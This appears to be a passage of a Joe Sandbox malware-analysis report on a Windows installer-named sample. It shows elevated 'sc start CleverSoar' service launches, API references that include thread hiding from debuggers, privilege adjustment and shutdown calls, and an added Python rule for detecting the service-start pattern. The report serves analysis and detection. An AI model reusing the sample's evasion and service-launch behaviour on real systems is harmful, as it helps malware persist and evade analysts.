                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:108
                            Start time:07:03:19
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

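The two `cmd /c start sc start CleverSoar` launches above (Target IDs 105 and 108, one second apart, both with elevated privileges) are the kind of pattern a detection rule over process-creation telemetry should catch: a service started through `sc` via a detached `cmd /c start` wrapper, and the same start command re-issued within seconds. The following is an added example, not code from the Joe Sandbox report or from the analysed sample. It parses the report's flattened `Key:Value` process records (the input below is a constructed copy of the entries for Target IDs 105 to 108) and flags both behaviours. The 5-second retry window and 2-attempt threshold are assumptions chosen for illustration.

```python
"""Flag suspicious service-start chains in sandbox process-tree output.

Added example; the SAMPLE text is constructed from the report's own process
records and is not an extract of any log format the sample itself produces.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: flattened copy of Target IDs 105-108 from the report.
SAMPLE = r"""
Target ID:105
Start time:07:03:18
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has elevated privileges:true
Target ID:106
Start time:07:03:18
Path:C:\Windows\System32\sc.exe
Commandline:sc start CleverSoar
Has elevated privileges:true
Target ID:107
Start time:07:03:19
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Has elevated privileges:true
Target ID:108
Start time:07:03:19
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /c start sc start CleverSoar
Has elevated privileges:true
"""

# "sc start <name>" anywhere in the command line, with or without ".exe".
SC_START = re.compile(r"\bsc(?:\.exe)?\s+start\s+(\S+)", re.IGNORECASE)
# "cmd /c start ..." launches the payload detached and returns immediately.
CMD_DETACH = re.compile(r"\bcmd(?:\.exe)?\s+/c\s+start\b", re.IGNORECASE)


def parse_records(text):
    """Split the report's 'Key:Value' lines into one dict per Target ID."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key == "Target ID":
            current = {"Target ID": value}
            records.append(current)
        elif current is not None:
            current[key] = value
    return records


def find_service_starts(records):
    """One finding per process whose command line starts a service with sc."""
    findings = []
    for rec in records:
        cmdline = rec.get("Commandline", "")
        match = SC_START.search(cmdline)
        if not match:
            continue
        findings.append({
            "target_id": rec["Target ID"],
            "time": rec.get("Start time"),
            "service": match.group(1),
            "via_cmd_start": bool(CMD_DETACH.search(cmdline)),
            "elevated": rec.get("Has elevated privileges", "").lower() == "true",
        })
    return findings


def find_retry_loops(findings, window_seconds=5, min_attempts=2):
    """Services whose start was attempted >= min_attempts times inside the window.

    Thresholds are assumptions for this example, not values from the report.
    """
    by_service = defaultdict(list)
    for finding in findings:
        by_service[finding["service"]].append(finding)
    loops = {}
    for service, attempts in by_service.items():
        times = sorted(datetime.strptime(a["time"], "%H:%M:%S") for a in attempts)
        if len(times) >= min_attempts and times[-1] - times[0] <= timedelta(seconds=window_seconds):
            loops[service] = len(times)
    return loops


def analyze(text):
    """Parse the records and return both classes of finding."""
    starts = find_service_starts(parse_records(text))
    return {"service_starts": starts, "retry_loops": find_retry_loops(starts)}


if __name__ == "__main__":
    for line in analyze(SAMPLE)["service_starts"]:
        print(line)
    print(analyze(SAMPLE)["retry_loops"])
```

On the report's own data this yields three `sc start CleverSoar` attempts (two wrapped in `cmd /c start`, one bare `sc.exe`), all elevated, within one second. The `start` verb explains the shape of the tree: it spawns `sc.exe` in its own console and returns at once, so the parent `cmd` exits immediately and a retrying launcher simply spawns another `cmd /c start` a second later.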
                              Execution Graph

                              Execution Coverage:1.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.8%
                              Total number of Nodes:778
                              Total number of Limit Nodes:10
                              [Execution graph: the interactive node/edge rendering is not reproduced here. Node addresses lie in the 0x6c84xxxx to 0x6c9exxxx range. API calls labelled on the graph include CreateProcessA, WaitForSingleObject, CloseHandle, Sleep, GetCurrentProcess/TerminateProcess, CreateFileA, CreateFileW, GetFileType, SetStdHandle, ReadFile, WriteFile, GetConsoleMode, FindFirstFileA/FindClose, CreateToolhelp32Snapshot/Process32FirstW/Process32NextW, OpenSCManagerA/OpenServiceA, GetCurrentThread/NtSetInformationThread, OpenProcessToken/LookupPrivilegeValueW/AdjustTokenPrivileges/NtInitiatePowerAction, ExitWindowsEx, GetPEB, IsProcessorFeaturePresent, RaiseException, EnterCriticalSection/LeaveCriticalSection, HeapAlloc/HeapFree, GetLastError/SetLastError, ExitThread and MultiByteToWideChar, alongside CRT/STL internals (std::_Facet_Register, std::ios_base::_Ios_base_dtor, __wsopen_s, __dosmaperr, __fassign, _Yarn, _strlen).]
79870->79873 79875 6c9dd39c GetLastError 79872->79875 79876 6c9dd342 79872->79876 79873->79872 79877 6c9dd2de ReadConsoleW 79873->79877 79874 6c9dd17e 79887 6c9dd132 __dosmaperr __wsopen_s 79874->79887 79893 6c9db1d9 20 API calls __wsopen_s 79874->79893 79875->79887 79876->79875 79878 6c9dd319 79876->79878 79877->79878 79880 6c9dd2fa GetLastError 79877->79880 79883 6c9dd37e 79878->79883 79884 6c9dd367 79878->79884 79878->79887 79880->79887 79882->79864 79886 6c9dd395 79883->79886 79883->79887 79895 6c9dd46e 23 API calls 3 library calls 79884->79895 79896 6c9dd726 21 API calls __wsopen_s 79886->79896 79894 6c9d4d2b HeapFree GetLastError _free 79887->79894 79889 6c9dd39a 79889->79887 79890->79887 79891->79866 79892->79874 79893->79882 79894->79857 79895->79887 79896->79889 79897->79857
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: d31c1c7ebbc84b86bd2b20647ba8afde67237884ff7267c4e68980d5738bde3a
                              • Instruction ID: 08f64b4fc1df1d80d9815f1945005c7f5e566ec512800e1154ab76c10a19c375
                              • Opcode Fuzzy Hash: d31c1c7ebbc84b86bd2b20647ba8afde67237884ff7267c4e68980d5738bde3a
                              • Instruction Fuzzy Hash: DE741531644B068FC738CF28C9D0A95B7E3EF95318B59CE2DC0A68BA55E774B54ACB40
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: a18a247f814932bf1da525558d7d30a1fb2255d31613a266fba5bcccb9fc2965
                              • Instruction ID: 56c09e684b951aab7bfb8fb5807e959f1c281ad212ab733bf6f0ac07103cb1d3
                              • Opcode Fuzzy Hash: a18a247f814932bf1da525558d7d30a1fb2255d31613a266fba5bcccb9fc2965
                              • Instruction Fuzzy Hash: 42342671644B018FC738CF28C9D0A96B7E3EF95314B998E6DC0964BB45E7B4B45ACB40

                              Control-flow Graph
                              • Function entry: 6c9c57b0 (graph rendering not reproduced)
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C9C57BE
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: d83ad523e2cf8e22d7c987bf5df32e2597f18d713c4479961b3f6aa667d1e9ad
                              • Instruction ID: e2aae1644d4c88286cae31696c884048f1ebef587b33a43fd41e530304af59b4
                              • Opcode Fuzzy Hash: d83ad523e2cf8e22d7c987bf5df32e2597f18d713c4479961b3f6aa667d1e9ad
                              • Instruction Fuzzy Hash: 3C314874608301EBD7109F28C888B1ABBF8AF95748F50896AE498D77A0D371D948AB53

                              Control-flow Graph
                              • Function entry: 6c843886 (graph rendering not reproduced)
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bdc2cd68b60c3453f983493cd065aeb90419e39b1212478f3c85c0b508555ae5
                              • Instruction ID: 5a977f958210483434b73ddd42f009fadff56e70b75584ee84d35c11c62b8164
                              • Opcode Fuzzy Hash: bdc2cd68b60c3453f983493cd065aeb90419e39b1212478f3c85c0b508555ae5
                              • Instruction Fuzzy Hash: D832D132245B058FC334CF28C990695B7E3EFD1314B69CE6CC0AA5BA95D775B84ACB50

                              Control-flow Graph
                              • Function entry: 6c843a6a (graph rendering not reproduced)
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 8fb417c4206979d16ad62c2d8afa729d0456c291d6f393e6ea06a9da3a5771f0
                              • Instruction ID: 958e7076f2465fb8d779f6975da0d861f23e23c2719d86a5d42022646cef560d
                              • Opcode Fuzzy Hash: 8fb417c4206979d16ad62c2d8afa729d0456c291d6f393e6ea06a9da3a5771f0
                              • Instruction Fuzzy Hash: 6351DE31145B098FC3308F28C980795B7A3BFE6314F69CE5DC0E61BA95DB75B94A8B41
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 75a55ff2d1c00288514b4bafec8d86422b0f2cbee5e7028c9f0aa6798bfe1273
                              • Instruction ID: 547db2803177bfcaf6905d454376d54864c8f56466912677237a0216f493283b
                              • Opcode Fuzzy Hash: 75a55ff2d1c00288514b4bafec8d86422b0f2cbee5e7028c9f0aa6798bfe1273
                              • Instruction Fuzzy Hash: 2D51BD31104B098BC330CF28C580796B7A3BFD6314F69CE5DC0E65BA95DB71B94A8B91
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: f1d9a09b03d871a4bfc8a1d1f966dfe94b8e3449ae1fb3ba23ed26ad4eb5509f
                              • Instruction ID: 73bdd746698dbd51ad0c29fedd43fb02fca1cf5005d9ccc8d816839657f8f427
                              • Opcode Fuzzy Hash: f1d9a09b03d871a4bfc8a1d1f966dfe94b8e3449ae1fb3ba23ed26ad4eb5509f
                              • Instruction Fuzzy Hash: DD31E331145B09CBD330CF28C9847C6B7A3BFE6314F298E1DC0A65BA81DB7579099B51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: d6423219c6045e8363ed4b2b84a0ceda71253e8b226ea1519bb183a6c444d21d
                              • Instruction ID: d6c85fab5c5e9234c44fe5db14637455189bc0d3d97e6c56b00ff1646bb93e26
                              • Opcode Fuzzy Hash: d6423219c6045e8363ed4b2b84a0ceda71253e8b226ea1519bb183a6c444d21d
                              • Instruction Fuzzy Hash: 0731DF31108B09CBD734CF28C590796B7A7BFA6304F698E1DC0EA5BA81DB71B949CB51
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C843E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C843EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 7d73c01b137f9e9aa3addbff1303ab473c817aa71188435bd30c44f84a06189e
                              • Instruction ID: ca865804c0c4920e2ec1f42751284879ca234729f0fa46d99ea6425dfb483988
                              • Opcode Fuzzy Hash: 7d73c01b137f9e9aa3addbff1303ab473c817aa71188435bd30c44f84a06189e
                              • Instruction Fuzzy Hash: A5210630118B09CBD338CF68C990796B7B7BF96305F28CE1DC0A64BA80DB75B9058B51
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C9C56A0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: f16abf0805bd84f058cafe310b46289e38330846df98a34e9796a7024b4e3010
                              • Instruction ID: 0cf7b1f27506604fd39de89e4030b90b327a170fb623c3bd79a8ee9687ac2ad7
                              • Opcode Fuzzy Hash: f16abf0805bd84f058cafe310b46289e38330846df98a34e9796a7024b4e3010
                              • Instruction Fuzzy Hash: 67312AB4608342EFC700CF28C584B4ABBF4AB89764F50895EF8C9C6361C371C945AB67
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C9BB44C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: 3da0e6fcc75042416382af3428b24e064930a11ec6833bb4953ebe2373421327
                              • Instruction ID: cb0f4d39dc35f3be0abe899d6e5851619a731d2b9fd0f705b79ead84d5710f59
                              • Opcode Fuzzy Hash: 3da0e6fcc75042416382af3428b24e064930a11ec6833bb4953ebe2373421327
                              • Instruction Fuzzy Hash: 85112574508351AFD7008B29D58851EBBF5BF86314F148E59F4A8DBBD1D334CC848B06
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C99B117
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: 838b06ed7d677081cbe7800a5ca24ef29304a7feb384c37842022088351b1a22
                              • Instruction ID: b469dd3b7542884cdd2cb6e7d3b5af86fcafbbdb2f620d36a758855fbad167b5
                              • Opcode Fuzzy Hash: 838b06ed7d677081cbe7800a5ca24ef29304a7feb384c37842022088351b1a22
                              • Instruction Fuzzy Hash: D8624670609381CFC724CF28C490A5ABBF5ABD9315F288D1EE8A9CB755D739D8858B42

                              Control-flow Graph (function at 6c9dd043; rendered graph and its node/edge listing omitted)
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 7d7c9fe6a48e9f71e27815b09bbf9f6e3954dddebccf5d510b7dee740bf2722d
                              • Instruction ID: 1edb91fe87557dd6f2c69766ca92fec8d39b32dd00e68c60a2a05f35a9465ded
                              • Opcode Fuzzy Hash: 7d7c9fe6a48e9f71e27815b09bbf9f6e3954dddebccf5d510b7dee740bf2722d
                              • Instruction Fuzzy Hash: CBC1F072A04A499FDB05CF98C880BADBBB4EF5A308F118159E424BBB81C770E905CF71

                              Control-flow Graph (function at 6c9e45dc; rendered graph and its node/edge listing omitted)
                              APIs
                                • Part of subcall function 6C9E49C7: CreateFileW.KERNEL32(00000000,00000000,?,6C9E4685,?,?,00000000,?,6C9E4685,00000000,0000000C), ref: 6C9E49E4
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E46F0
                              • __dosmaperr.LIBCMT ref: 6C9E46F7
                              • GetFileType.KERNEL32(00000000), ref: 6C9E4703
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9E470D
                              • __dosmaperr.LIBCMT ref: 6C9E4716
                              • CloseHandle.KERNEL32(00000000), ref: 6C9E4736
                              • CloseHandle.KERNEL32(6C9DB640), ref: 6C9E4883
                              • GetLastError.KERNEL32 ref: 6C9E48B5
                              • __dosmaperr.LIBCMT ref: 6C9E48BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: 828e25f2ff41c8495babe60c4a300db9db5f61b17f78af6a1274fa8439ec51c9
                              • Instruction ID: c81f62f7c38d9ce639d3907a03f3904d96f814a02da326a5030f8d676f161c54
                              • Opcode Fuzzy Hash: 828e25f2ff41c8495babe60c4a300db9db5f61b17f78af6a1274fa8439ec51c9
                              • Instruction Fuzzy Hash: 99A11632A141498FCF0A9FA8CC5179D3BB5AF2B328F144159E821AF791C735D916CF52

                              Control-flow Graph (function at 6c99c750; rendered graph and its node/edge listing omitted)
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2245484598.000000006C841000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C840000, based on PE: true
                              • Associated: 00000006.00000002.2245457389.000000006C840000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246843396.000000006C9E8000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2246940930.000000006C9F8000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247669424.000000006CAC3000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2247705873.000000006CAC9000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.2248715227.000000006CBB3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c840000_#U5b89#U88c5#U52a9#U624b2.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: 1ab72d555d8dcb7c7476ecf421390fc58935475e59bc13c574f6195f47cfbec3
